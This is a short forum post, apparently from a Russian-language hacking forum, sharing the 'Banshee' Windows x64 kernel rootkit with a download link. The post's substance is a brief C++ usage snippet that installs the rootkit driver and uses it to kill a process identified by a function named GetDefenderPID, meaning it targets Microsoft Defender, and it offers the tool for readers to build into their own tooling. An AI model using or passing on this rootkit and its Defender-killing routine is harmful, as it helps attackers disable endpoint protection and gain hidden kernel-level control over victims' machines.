• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Banshee rootkit

Zodiac

RAM
Пользователь
Регистрация
04.11.2022
Сообщения
108
Реакции
40
Banshee rootkit
Experimental Windows x64 Kernel Driver/Rootkit.


Usage​


You can integrate Banshee into your tooling, by including the Banshee.hpp file in your project, e.g.:


Banshee banshee = Banshee();
banshee.Install(driverPath);
banshee.Initialize();

int targetPid = GetDefenderPID(); // this would be your implementation
banshee.IoCtlKillProcess(targetPid); // instruct banshee to kill the targetprocess

download - https://github.com/eversinc33/Banshee
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх